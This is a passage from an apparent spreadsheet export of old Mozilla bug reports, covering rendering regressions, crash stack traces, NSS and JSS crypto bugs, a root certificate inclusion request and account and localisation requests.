  </si>
  <si>
    <t>CORE-311146</t>
  </si>
  <si>
    <t>position:fixed elements scroll with page / redraw badly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051004 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051004 Firefox/1.4.1
Elements on the page that are supposed to be fixed position are being scrolled
with the page and are redrawn incorrectly when scrolled back into view.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.xiven.com/
2. Scroll down
3. Scroll back up again
Actual Results:  
Right menu scrolls with the page when scrolling down and is redrawn incorrectly
when scrolling back up.
Expected Results:  
Right menu should not move when the page is scrolled.
Regressed between 20051003 and 20051004</t>
  </si>
  <si>
    <t>tom.pike</t>
  </si>
  <si>
    <t>CORE-194876</t>
  </si>
  <si>
    <t>Want tree attribute for column picker tooltip text</t>
  </si>
  <si>
    <t>Spun off from bug 112264.
MailNews wants the column picker to have a tooltip.</t>
  </si>
  <si>
    <t>CORE-177494</t>
  </si>
  <si>
    <t>[ps] problem while printing to ps file</t>
  </si>
  <si>
    <t>Hi I'm using Mozilla 1.0 on a Debian GNU/Linux 3.0 ( aka Woody )
While writing a web page using css2 I had a problem. If I a web object use this
property:   border:1px solid black the visualization is ok ( see foo.html )
the preview is also ok but when I print to a ps file the borders of the whole
page are marked with a black line ( see mozilla.ps ).
It doesn't appear if the css property is border: 1px dashed black
The problem I detect may be viewed at ( foo.html and the ps file mozilla.ps ):
            www.conysis.com/~diego/test-mozilla</t>
  </si>
  <si>
    <t>zhayupeng</t>
  </si>
  <si>
    <t>dbrouard</t>
  </si>
  <si>
    <t>SEAMONKEY-188943</t>
  </si>
  <si>
    <t>M130A crash clicking on links [@ nspr4.dll | NSPR4.DLL]</t>
  </si>
  <si>
    <t>There have been a lot of crashed with Mozilla 1.3 Alpha under the nspr4.dll
stack signature.  The stack trace isn't very helpful but there are a lot of
urls and comments that might help us reproduce.  Most users mention clicking on
links before seeing the crash.
Here is the latest from Talkback:
5   nspr4.dll   345 
====================================================================================================
     Count   Offset    Real Signature
[ 96   nspr4.dll + 0x12459 (0x60fd2459) 617f2e07 - nspr4.dll + 0x12459
(0x60fd2459) ]
[ 46   nspr4.dll + 0x12459 (0x60fd2459) 9b919572 - nspr4.dll + 0x12459
(0x60fd2459) ]
[ 15   nspr4.dll + 0x12459 (0x60fd2459) 0fd1c13c - nspr4.dll + 0x12459
(0x60fd2459) ]
[ 12   nspr4.dll + 0x12459 (0x60fd2459) 4571626b - nspr4.dll + 0x12459
(0x60fd2459) ]
[ 12   nspr4.dll + 0x12459 (0x60fd2459) 414e31fd - nspr4.dll + 0x12459
(0x60fd2459) ]
[ 10   nspr4.dll + 0x12459 (0x60fd2459) d41821b9 - nspr4.dll + 0x12459
(0x60fd2459) ]
[ 9   nspr4.dll + 0x12459 (0x60fd2459) eb49543c - nspr4.dll + 0x12459 (0x60fd2459) ]
[ 7   nspr4.dll + 0x12459 (0x60fd2459) 8ee54fe5 - nspr4.dll + 0x12459 (0x60fd2459) ]
[ 6   nspr4.dll + 0x12459 (0x60fd2459) b447ff1a - nspr4.dll + 0x12459 (0x60fd2459) ]
[ 6   nspr4.dll + 0x12459 (0x60fd2459) 463c7252 - nspr4.dll + 0x12459 (0x60fd2459) ]
[ 5   nspr4.dll + 0x12459 (0x60fd2459) f8f94aaf - nspr4.dll + 0x12459 (0x60fd2459) ]
     Crash date range: 2003-01-09 to 2003-01-11
     Min/Max Seconds since last crash: 12 - 1865548
     Min/Max Runtime: 317 - 13836471
     Keyword List : click(11) http(5) link(6) mail(4)  
     Count   Platform List 
     145   Windows NT 5.1 build 2600
     79   Windows NT 5.0 build 2195
     Count   Build Id List 
     224   2002121215
     No of Unique Users       189
 Stack trace(Frame) 
	 nspr4.dll + 0x12459 (0x60fd2459)  
	 xpcom.dll + 0x30a52 (0x61de0a52)  
	 USER32.dll + 0x27ad7 (0x77d67ad7)  
	 0x5e204689   
     (16071503)	URL: http://www.alandfaraway.net/
     (16071501)	Comments: anacho
     (16070954)	URL: www.pricewatch.com
     (16070954)	Comments: Clicked on a buy button
     (16070166)	URL: http://www.thedenverchannel.com/
     (16069843)	Comments: open page in new window
     (16069400)	URL: http://www.civfanatics.com
     (16069400)	Comments: A useless annoying popup window was opening.
     (16069323)	Comments: Clicked on following URL in Netscape mail:   
     (16069323)	Comments: 
http://www.sierratradingpost.com/xq/asp/base_no.61199/str_base_no.60656 60719
60763 60770 60963 60964 61002 61081 61087 61093 61152 61172 61173 61199 61225
61258 61266 61285 61290 61291
/header_title./page_name.prod_list_display_special.asp/search_type.L
     (16069323)	Comments:
1%7E366/size1./size2./gender.0/ShowImages.yes/sq.60/cont.1/sqlSearchStr./intPgNo.4/special_type.sale/qx/product.asp
     (16068756)	URL:
http://eq.castersrealm.com/archetype/default.asp?Action=Cat&amp;ClassId=10
     (16068081)	URL: loading a message at www.abuse101.com
     (16067478)	Comments: clicked on an internet URL inside of an e-mail.  
     (16066563)	URL: http://babylonscript.free.fr/
     (16066563)	Comments: don't know! just surfing
     (16066193)	URL: www.monima.cz
     (16066193)	Comments: detail of product
     (16064644)	URL: www.abit-usa.com/products/mb/be7g/
     (16064644)	Comments: clicked on a MB for a larger size and this was generated.
     (16062458)	URL: www.sotovik.ru
     (16062458)	Comments: Clicked on the link.
     (16061425)	URL: www.wodisoft.com
     (16061425)	Comments: always the same
     (16061281)	Comments: same procedure as last year
     (16061265)	Comments: I was opening a website that was in my sidebar (dont
remember which one) Please allow middle mouse button clicking in the sidebar to
open web pages in a new tab easily.
     (16060673)	Comments: viewing a picture 1024x768 from www.wodisoft.com
     (16059805)	URL: www.google.com
     (16059805)	Comments: search google for information on kazaa
     (16059426)	URL: www.tv.nu
     (16059235)	URL: www.gathering.tweakers.net
     (16056988)	Comments: clicked on a link included in an email message. the
link is -   
http://computerworld.com/newsletter/0%2C4902%2C77450%2C0.html?nlid=PM  
     (16056823)	Comments: opening a link (by javascript) on googlefigth
     (16056635)	Comments: I was clicking the back button from
http://alameda.abracat.com/c2/apartments/results/index.xml
     (16055938)	URL: http://noc.live365.com:81/functions/confirm-survey.html
     (16055938)	Comments: I submitted a web form in an email within the mail
client  which opened the browser and killed Mozilla. I tried to reproducable the
problem  but with no success: after the incident  it worked just like it should.
     (16055681)	URL: www.clarin.com.ar
     (16055681)	Comments: browsing
     (16054029)	URL: http://www.mail.com
     (16052466)	URL: www.tucows.com
     (16052466)	Comments: Clicked on the link to www.gozilla.com (new window popup)
     (16051541)	URL: http://www pixelgenius.com
     (16051191)	URL: http://www.bids.co.uk
     (16050579)	URL: www.loi.nl
     (16050323)	URL: http://www.capoeira.nu
     (16050323)	Comments: Simply opening a gif image
     (16048664)	Comments: crashed on a meta refresh html doc when opened in a
new window
     (16048327)	URL: www.amazon.de
     (16048060)	URL: tw.giga-byte.com
     (16047599)	URL: www.nvidia.com
     (16046195)	URL: http://www.thedenverchannel.com/
     (16046052)	URL: http://www.thedenverchannel.com/
     (16045896)	Comments: loading pdf document
     (16045695)	URL: http://www.thedenverchannel.com/
     (16043726)	URL:
http://discovirtual.terra.com.mx/vd/vd.cgi?+_wi=126302-14341-85681&amp;_we=13
     (16043726)	Comments: I just browsed to http://www.camwhores.com and waited.
     (16043492)	URL: www.gtcomm.net
     (16043492)	Comments: clicked on show all vhosts  new window started to open
 then died
     (16041080)	Comments: ?i????  when i open http://emset.com
     (16040931)	URL: freshmeat.net
     (16040931)	Comments: Had two tabs open  selected a link (to a screenshot)
to open in a new tab  * crash *. Normally these freshmeat screenshot links spawn
a new window I think the freshmeat screenshots open via javascript (?).  
     (16040875)	URL: pocomail.com
     (16040875)	Comments: web tour  looking at address book screenshot
     (16039118)	URL: http://www.thedenverchannel.com/
     (16038860)	URL: http://games.swirve.com/utopia
     (16038860)	Comments: Nothing...
     (16038841)	URL: www.sharereactor.com
     (16038841)	Comments: clicked a picture link that opened a new window and it
crashed
====================================================================================================
     Count   Offset    Real Signature
[ 12   nspr4.dll + 0x12456 (0x60fd2456) 7c75b554 - nspr4.dll + 0x12456
(0x60fd2456) ]
[ 11   nspr4.dll + 0x12456 (0x60fd2456) 869b0e21 - nspr4.dll + 0x12456
(0x60fd2456) ]
     Crash date range: 2003-01-10 to 2003-01-11
     Min/Max Seconds since last crash: 202 - 396106
     Min/Max Runtime: 3244 - 977935
     Keyword List :  
     Count   Platform List 
     12   Windows NT 5.1 build 2600
     11   Windows NT 5.0 build 2195
     Count   Build Id List 
     23   2002121215
     No of Unique Users        22
 Stack trace(Frame) 
	 nspr4.dll + 0x12456 (0x60fd2456)  
	 xpcom.dll + 0x30a52 (0x61de0a52)  
	 USER32.dll + 0x27ad7 (0x77d67ad7)  
	 0x5e204689   
     (16071382)	Comments: Clicked a link  
     (16067826)	URL: www.skinz.org
     (16067826)	Comments: browsing for wallpaper
     (16055754)	URL: http://edicola.html.it/best.htm
     (16055456)	URL: www.hgtv.com
     (16055456)	Comments: I was at hgtv.com and clicked on the enter today link.
 That is when Netscape died.
     (16046717)	URL: www.wincustomize.com
     (16041161)	URL: loading a message at www.abuse101.com
     (16040811)	URL: loading a message at www.abuse101.com
     (16039035)	Comments: looking up a word at dictionary.com
================================================================================
Rank    StackSignature    Count  
16   NSPR4.DLL   39 
====================================================================================================
     Count   Offset    Real Signature
[ 15   NSPR4.DLL + 0x12456 (0x60fd2456) 04dd5da7 - NSPR4.DLL + 0x12456
(0x60fd2456) ]
[ 2   NSPR4.DLL + 0x12456 (0x60fd2456) 3b7b19ce - NSPR4.DLL + 0x12456 (0x60fd2456) ]
     Crash date range: 2003-01-10 to 2003-01-11
     Min/Max Seconds since last crash: 54 - 407588
     Min/Max Runtime: 54 - 1932480
     Keyword List :  
     Count   Platform List 
     13   Windows 98 4.10 build 67766446
     2   Windows 98 4.90 build 73010104
     2   Windows 98 4.10 build 67766222
     Count   Build Id List 
     17   2002121215
     No of Unique Users        16
 Stack trace(Frame) 
	 NSPR4.DLL + 0x12456 (0x60fd2456)  
	 XPCOM.DLL + 0x30a52 (0x61de0a52)  
	 KERNEL32.DLL + 0x363b (0xbff7363b)  
	 0x5e204689   
     (16061532)	URL: www.benq.com
     (16054043)	URL: www.netscape\comp\netscape
     (16048256)	URL:
http://cgi.es.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=1565954600
     (16047420)	URL: www.windows.com
     (16047420)	Comments: updating
     (16040077)	URL: www.northwestsavingsbank.com
====================================================================================================
     Count   Offset    Real Signature
[ 9   NSPR4.DLL + 0x12460 (0x60fd2460) bd12ca65 - NSPR4.DLL + 0x12460 (0x60fd2460) ]
[ 6   NSPR4.DLL + 0x12460 (0x60fd2460) 82b48e0c - NSPR4.DLL + 0x12460 (0x60fd2460) ]
     Crash date range: 2003-01-10 to 2003-01-11
     Min/Max Seconds since last crash: 34 - 176516
     Min/Max Runtime: 716 - 943466
     Keyword List :  
     Count   Platform List 
     6   Windows 98 4.90 build 73010104
     6   Windows 98 4.10 build 67766446
     3   Windows 98 4.10 build 67766222
     Count   Build Id List 
     15   2002121215
     No of Unique Users        15
 Stack trace(Frame) 
	 NSPR4.DLL + 0x12460 (0x60fd2460)  
	 XPCOM.DLL + 0x30a52 (0x61de0a52)  
	 KERNEL32.DLL + 0x363b (0xbff7363b)  
	 0x5e204689   
     (16045680)	URL: www.yahoo.com
     (16045448)	URL: rootsmusiccanada.com
     (16042856)	URL: http://www.ffwa.org
     (16042856)	Comments: Surviving a barrage of pop-ups
     (16042570)	URL: www.moosehockey.ca
     (16041565)	Comments: I was clicking on a link.
====================================================================================================
     Count   Offset    Real Signature
[ 5   NSPR4.DLL + 0x12459 (0x60fd2459) 739a5304 - NSPR4.DLL + 0x12459 (0x60fd2459) ]
[ 1   NSPR4.DLL + 0x12459 (0x60fd2459) 9853a547 - NSPR4.DLL + 0x12459 (0x60fd2459) ]
[ 1   NSPR4.DLL + 0x12459 (0x60fd2459) 4c3c176d - NSPR4.DLL + 0x12459 (0x60fd2459) ]
     Crash date range: 2003-01-10 to 2003-01-11
     Min/Max Seconds since last crash: 311 - 58770
     Min/Max Runtime: 57643 - 459541
     Keyword List :  
     Count   Platform List 
     5   Windows 98 4.10 build 67766446
     1   Windows 98 4.90 build 73010104
     1   Windows 95 4.0 build 67109814
     Count   Build Id List 
     7   2002121215
     No of Unique Users         7
 Stack trace(Frame) 
	 NSPR4.DLL + 0x12459 (0x60fd2459)  
	 XPCOM.DLL + 0x30a52 (0x61de0a52)  
	 KERNEL32.DLL + 0x363b (0xbff7363b)  
	 0x5e204689   
     (16065557)	URL: www.danfoss.com
     (16062289)	URL: www.intelihealth.com/IH/ihtlH/WSIHW000/23722...</t>
  </si>
  <si>
    <t>CORE-309850</t>
  </si>
  <si>
    <t>E4x - JS_ASSERT @ js_Interpret line 1814</t>
  </si>
  <si>
    <t>This assert began sometime after 9/11 in debug builds on branch and trunk on at
least winxp. It was reproduced today with a 2005092311 trunk build.
e4x/Expressions/11.2.2.js
e4x/Expressions/11.2.4.js
e4x/XML/13.4.4.4.js
e4x/XML/13.4.4.7.js
	depth	0x00000007
+	fp-&gt;sp	0x0041d9f0
+	fp-&gt;spbase	0x0041d9dc
+	sp	0x0041d9f0
NTDLL! 7c901230()
js_Interpret(JSContext * 0x000371b8 unsigned char * 0x0042540d long *
0x0013ed38) line 1814 + 39 bytes
js_FilterXMLList(JSContext * 0x000371b8 JSObject * 0x00039b50 unsigned char *
0x0042540d long * 0x0013ed38) line 7855 + 17 bytes
js_Interpret(JSContext * 0x000371b8 unsigned char * 0x0042540a long *
0x0013ee24) line 5067 + 36 bytes
js_Execute(JSContext * 0x000371b8 JSObject * 0x000387c8 JSScript * 0x004251f0
JSStackFrame * 0x00000000 unsigned int 0x00000000 long * 0x0013fecc) line 1393
+ 19 bytes
JS_ExecuteScript(JSContext * 0x000371b8 JSObject * 0x000387c8 JSScript *
0x004251f0 long * 0x0013fecc) line 3842 + 25 bytes
Process(JSContext * 0x000371b8 JSObject * 0x000387c8 char * 0x00032d56) line
223 + 22 bytes
ProcessArgs(JSContext * 0x000371b8 JSObject * 0x000387c8 char * * 0x00032cc4
int 0x00000006) line 426 + 23 bytes
main(int 0x00000006 char * * 0x00032cc4 char * * 0x00033188) line 2552 + 21 bytes
JS! mainCRTStartup + 227 bytes
KERNEL32! 7c816d4f()</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-174699</t>
  </si>
  <si>
    <t>hot key for Tool-Page Info-Security tab doesn't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2b) Gecko/20021011 Phoenix/0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2b) Gecko/20021011 Phoenix/0.3
Goto Tools Page Info and all the hotkeys for each tab work except Security tab
which shows alt-s for the associated accesibility key but it does not work
Reproducible: Always
Steps to Reproduce:
1. Open Page Info from tools menu
2. alt-s to get security tab
3.
Actual Results:  
nothing
Expected Results:  
switched to the security tab</t>
  </si>
  <si>
    <t>duaneec</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-703628</t>
  </si>
  <si>
    <t>People account request - Andrew Halberstadt</t>
  </si>
  <si>
    <t>Created attachment 575487
public key
Hello I'd like to attach my public key to my ldap for access to my people account.
Thanks very much!</t>
  </si>
  <si>
    <t>MOZILLA.ORG-263732</t>
  </si>
  <si>
    <t xml:space="preserve">l10n CVS request - Portuguese Portugal (pt-PT) - Carlos Rodrigues </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Hi I would like to request a CVS account for the localization of Firefox (and
Thunderbird when things are in place for it).
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>BUGZILLA-292119</t>
  </si>
  <si>
    <t>[PostgreSQL] POSITION(...) clause must be type boolean not type integer</t>
  </si>
  <si>
    <t>If I enter anything (e.g.: foo) in the Quicksearch box on
http://landfill.bugzilla.org/bugzilla-tip-pg/
and submit the query then Bugzilla will die with a 
Software error:
DBD::Pg::st execute failed: ERROR:  Argument of WHERE must be type boolean not
type integer [for Statement SELECT products.id FROM products WHERE
POSITION('foo' IN LOWER(products.name))] at Bugzilla/DB.pm line 80
	Bugzilla::DB::SendSQL('SELECT products.id FROM products WHERE POSITION(\'foo\'
IN LO...') called at Bugzilla/Search.pm line 1487
	Bugzilla::Search::build_subselect('bugs.product_id''products.id''products''POSITION(\'foo\'
IN LOWER(products.name))') called at Bugzilla/Search.pm line 865
	Bugzilla::Search::__ANON__ called at Bugzilla/Search.pm line 1269
	Bugzilla::Search::init('Bugzilla::Search=HASH(0xa329890)') called at
Bugzilla/Search.pm line 85
	Bugzilla::Search::new('Bugzilla::Search''fields''ARRAY(0xa04e6d4)''params''Bugzilla::CGI=HASH(0xa2ff730)''order''ARRAY(0xa057504)')
called at /var/www/html/bugzilla-tip-pg/buglist.cgi line 763</t>
  </si>
  <si>
    <t>CORE-444489</t>
  </si>
  <si>
    <t>UpdateLayeredWindow bad prototype in widget/src/windows/nsWindow.cpp</t>
  </si>
  <si>
    <t>Created attachment 328796
Fixes UpdateLayeredWindow prototype for WinCE builds
For Windows Builds UpdateLayeredWindow prototype is good enough to build and run correctly.
For WINCE builds the prototype mismatch can produce bogus calling code in nsWindow.cpp.</t>
  </si>
  <si>
    <t>CORE-200139</t>
  </si>
  <si>
    <t>htmlparser has way too many tables</t>
  </si>
  <si>
    <t>nsHTMLEntities.cpp defines way too many tables and allocates a whole bunch of
them for no good reason. Attached is a fix which includes lots of const-ness
which sfraser will be happy about.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-437633</t>
  </si>
  <si>
    <t>Make automation.py's class Process use the subprocess module</t>
  </si>
  <si>
    <t>In build/pgo/automation.py.in there's this:
  class Process:
    Represents a subprocess of this process.  We don't just directly use the
    subprocess module here because we want compatibility with Python 2.3 on
    non-Windows platforms.  :-(
subprocess isn't included in the Python 2.3 standard library but it *is* compatible with Python 2.3 (and even 2.2) all we need to do is hg add a copy of subprocess.py (with a different name) and conditionally import that.
(Might not be worth it although it does look like Process would tend to create zombie processes when exceptions happen.  Filing for good luck.)</t>
  </si>
  <si>
    <t>bjarne</t>
  </si>
  <si>
    <t>WEBTOOLS-466004</t>
  </si>
  <si>
    <t>Prior Art</t>
  </si>
  <si>
    <t>Add editing of references</t>
  </si>
  <si>
    <t>Any logged in user should be able to edit any reference.</t>
  </si>
  <si>
    <t>SEAMONKEY-164489</t>
  </si>
  <si>
    <t>contentAreaUtils.js should use appendFilters for well known types (text allfiles)</t>
  </si>
  <si>
    <t>while reviewing the patch for bug 80579 i noticed this...
/xpfe/communicator/resources/content/contentAreaUtils.js line 518 -- 
aFilePicker.appendFilter(bundle.GetStringFromName(TextOnlyFilter) *.txt)
/xpfe/communicator/resources/content/contentAreaUtils.js line 537 -- 
aFilePicker.appendFilter(bundle.GetStringFromName(AllFilesFilter) *.*)
/xpfe/communicator/resources/content/contentAreaUtils.js line 541 -- 
aFilePicker.appendFilter(bundle.GetStringFromName(AllFilesFilter) *.*)
the correct function calls are:
/xpfe/communicator/resources/content/openLocation.js line 157 -- 
fp.appendFilters(nsIFilePicker.filterText)
/xpfe/communicator/resources/content/openLocation.js line 158 -- 
fp.appendFilters(nsIFilePicker.filterAll)</t>
  </si>
  <si>
    <t>NSS-338071</t>
  </si>
  <si>
    <t>Coverity 953 pk11_CreateNewContextInSlot may dereference a NULL symkey pointer</t>
  </si>
  <si>
    <t>security/nss/lib/pk11wrap/pk11cxt.c function pk11_CreateNewContextInSlot may cause a null pointer dereference if it is passed in with parameters:
type = CKM_SKIP_JACK_CBC64
slot = (not null)
operation = CKA_DIGEST
symKey = NULL
Even if this cannot happen at runtime it should have an assertion at the beginning of function something like:
PORT_Assert(!(type == CKM_SKIP_JACK_CBC64 
Can someone famaliar with this code confirm it?</t>
  </si>
  <si>
    <t>feng.qian.moz</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-493001</t>
  </si>
  <si>
    <t>Dynamically generate weave prefs engine list based on registered engines</t>
  </si>
  <si>
    <t>Other data sources should be registering with the weave service with Engines.register so we can use that to generate a list of engines.
We'll need some way to toggle enabled as well as determine if an engine is disabled.</t>
  </si>
  <si>
    <t>CORE-385904</t>
  </si>
  <si>
    <t>Actually hook up the new NSS error strings</t>
  </si>
  <si>
    <t>In bug 107491 I added new code that would:
- prefer error strings defined by PSM
- fall back to error strings provided by NSS
My patch to fall back to the NSS error strings was incomplete.
I had introduced a new nsserrors.properties file but I continued to look for string IDs in the existing file.
While a simple fix would be to move all the NSS error strings to the existing properties file I explicitly don't want to do that. I would like to have nsserrors.properties as a separate file so it can easily get dynamically updated (we don't do that yet but we should in the future).
This bug didn't get noticed earlier because nearly all NSS error codes had overrides defined in PSM. When we recently reviewed bug 355643 we removed PSM's overrides for most errors and today I finally noticed we provide no error explanation...
I'm attaching a patch that introduces a new string bundle and change PSM to do the lookup in the correct bundle file...</t>
  </si>
  <si>
    <t>FIREFOX-245655</t>
  </si>
  <si>
    <t>Security warning dialogs cannot be made permanent through the checkbox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040604 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040604 Firefox/0.8.0+
When doing an insecure submit for the first time (for example when entering a
search term in http://www.google.com/) a warning dialogue appears with a
checkbox allowing you to see such warnings in the future disabled. When a
submission occurs and the checkbox is left blank further searches will
naturally not prompt further warnings. On the other hand when the box is
checked the dialog will appear again during a second submission.
The problem lies in that when the dialog appears for the second time the
checkbox is blank again forcing the security conscious user to have to check it
after each submission and eventually making him desist.
A workaround is to enter as a URL about:config and make
security.warn_submit_insecure.show_once false (and if necessary make
security.warn_submit_insecure true again).
This problem is probably true for other options of the security.warn_* kind.
Reproducible: Always
Steps to Reproduce:
1. Fill in an insecure form (such as the one in http://www.google.com/) and try
to submit it.
2. In the warning dialog that appears check the box allowing for futher similar
warnings to appear.
3. Repeat the first step.
Actual Results:  
The checkbox in the warning dialog is again unchecked.
Expected Results:  
The checkbox should have appeared as selected.</t>
  </si>
  <si>
    <t>gonhidi</t>
  </si>
  <si>
    <t>CORE-525582</t>
  </si>
  <si>
    <t xml:space="preserve">{inc}Text disappears after I tweak window-width with and </t>
  </si>
  <si>
    <t>Created attachment 409440
testcase 1: only works if you save locally
STEPS TO REPRODUCE:
 1. Load URL
 2. Change Firefox's width so that the checkin message all fits on one line except for the final two words bug 523405 which wrap to their own line.
 3. Increase Firefox width slightly so that Bug pops back up to first line.
ACTUAL RESULTS:
 Bug number disappears from next line.
See attached reduced testcase which resizes your window at load-time and should automatically reproduce the bug for you.
BROKEN:
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.3a1pre) Gecko/20091030 Minefield/3.7a1pre
WORKS:
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3</t>
  </si>
  <si>
    <t>CORE-373081</t>
  </si>
  <si>
    <t>Fix up thebes tests</t>
  </si>
  <si>
    <t>Created attachment 257744
fix tests as described
The Thebes tests haven't been built for a while apparently because they haven't been kept in sync with various Thebes API changes.
I've updated the tests so that they build and mostly work. I've also extended the font selection tests to work on Linux. And I've added a bunch of font selection test cases. I think these tests should be built whenever tests are enabled.
The font selection tests are a problem because they depend on precisely what fonts you have installed. For example my Windows XP install doesn't have MS UI Gothic so I fail font selection tests. This is hard to fix. One way to fix it would be to have the ability to restrict font selection to some hardcoded list of fonts (per platform) while testing and then check that those fonts actually exist on the user's system when they run the test.
In the font selection tests on Linux font fallback doesn't seem to work. I'm not sure why probably I didn't initialize something but I'm not sure what.</t>
  </si>
  <si>
    <t>CORE-353197</t>
  </si>
  <si>
    <t>Table interface missing from data tables</t>
  </si>
  <si>
    <t>Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060918 Minefield/3.0a1
See test case. Table on http://live.gnome.org does not have interface either.</t>
  </si>
  <si>
    <t>THUNDERBIRD-261682</t>
  </si>
  <si>
    <t>View Unread messages updates to quickly.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
Under Thunderbird 0.8 on Windows XP if you select View Unread and then view
some messages Thunderbird will update the message selection area after a few
seconds.
The update will hide the currently viewed message from the selection window.
This update also for a short time clears the message selection area as it
populates it with just unread messages. 
Versions before 0.8 did not do this. Is there a way to set the way View Unread
back to the old method. Having the message I just read vanish clear the message
selection are re-update the message selection area is anoying. I liked how I 
could start Thunderbird at the begining of the day and not have to keep 
switching the View to find just read messages.
Reproducible: Always
Steps to Reproduce:
See the URL I provided for screenshots.</t>
  </si>
  <si>
    <t>JSS-144934</t>
  </si>
  <si>
    <t>generating DSA public key from spec is broken</t>
  </si>
  <si>
    <t>org/mozilla/jss/provider/java/security/JSSKeyFactory1_2.engineGeneratePublic is
broken in the DSA case. We are creating a DSA public key using only the Y
public value. This is insufficient because signature verification for example
also requires the PQG parameters. The DSAPublicKeySpec actually contains PQG
but we aren't using them.
I think the bug may actually be in PK11PubKey.fromRaw() which purports to
create a DSA public key just from its public value but in fact the thing it
creates is useless. But a fix/workaround is to take PQG and Y out of the DSA
PublicKey spec and build a SubjectPublicKeyInfo out of them and then pass that
to PK11PubKey.fromSPKI.</t>
  </si>
  <si>
    <t>NSS-493258</t>
  </si>
  <si>
    <t>Add Cybertrust Global Root certificate to NSS</t>
  </si>
  <si>
    <t>This bug requests inclusion in the NSS root certificate store of the following
certificate owned by Verizon.
Friendly name: Cybertrust Global Root
Certificate location: 
http://cacert.omniroot.com/ct_root_ss.crt
SHA1 Fingerprint: 
5f:43:e5:b1:bf:f8:78:8c:ac:1c:c7:ca:4a:9a:c6:22:2b:cc:34:c6
Trust flags: Websites 
Test URL: 
https://secure.ichotelsgroup.com/
This CA has been assessed in accordance with the Mozilla project guidelines and the root certificate have been approved for inclusion in bug 430700.
The next steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is
correct and that the correct certificate(s) have been attached. They must also
specify what OS they would like to use to perform the verification below.
2) A Mozilla representative creates a test build of NSS with the new
certificate(s) and attaches nssckbi.dll to this bug. A representative of the
CA must download this drop it into a copy of Firefox and/or Thunderbird on the
OS in question and confirm (by adding a comment here) that the certificate(s)
have been correctly imported and that websites work correctly.
3) The Mozilla representative checks the certificate(s) into the NSS store and
marks the bug RESOLVED FIXED.
4) At some time after that various Mozilla products will move to using a
version of NSS which contains the certificate. This process is mostly under the
control of the release drivers for those products.</t>
  </si>
  <si>
    <t>CORE-235018</t>
  </si>
  <si>
    <t>[os2] Icon in download dialog is based on extension not MIME type</t>
  </si>
  <si>
    <t>(os/2 version of bug 229695)
(code inspection indicates os/2 has that problem)
When you download a file and you get the dialog the icon is based on the
extension of the file not the MIME type of the file. It should be based on the
MIME type (even if there wasn't one in those cases we would internally guess
one not necessarily only on the extension and that should match the icon).
the patch used for bug 229695 may work here as well assuming os/2 gives back a
generic icon when asked for ..
see bug 229695 comment 15.</t>
  </si>
  <si>
    <t>jdunn</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-246681</t>
  </si>
  <si>
    <t>Translate forieusers.xhtml into german</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a2) Gecko/20040612
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a2) Gecko/20040612
Zur Zeit ist nur forieusers.html uebersetzt und auch nicht mehr up to date.
Ich hab mal angefangen denke bis zum WE werd ich fertig sein.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>SEAMONKEY-194045</t>
  </si>
  <si>
    <t>empty chrome directories are left when building jar files</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030217
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030217
Sorry I can't find a suitable component/target to report this problem.  So
I just pick 'browser'.
I found under the bin/ directory there're 538 files and 1013 directories.
(I got the mozilla by downloading a daily mozilla-win32.zip and unzip it.)
There must be a lot of empty directories under the bin directory.  Why are
they needed?  Isn't there any better arrangement of the directories?  For
example I found that bin\chrome\classic\skin directory (and all its
subdirectoris) mirrored the directory structure in bin\chrome\classic.jar
but the former are empty.  Are they really needed?
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
too many unnecessary empty directories (causing many disk fragments etc)
Expected Results:  
files/directories should be more efficiently organized</t>
  </si>
  <si>
    <t>FIREFOX-485358</t>
  </si>
  <si>
    <t>Bookmarks sidebar context menu items gets disabled after loading bookmark in the background</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 fi rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 fi rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
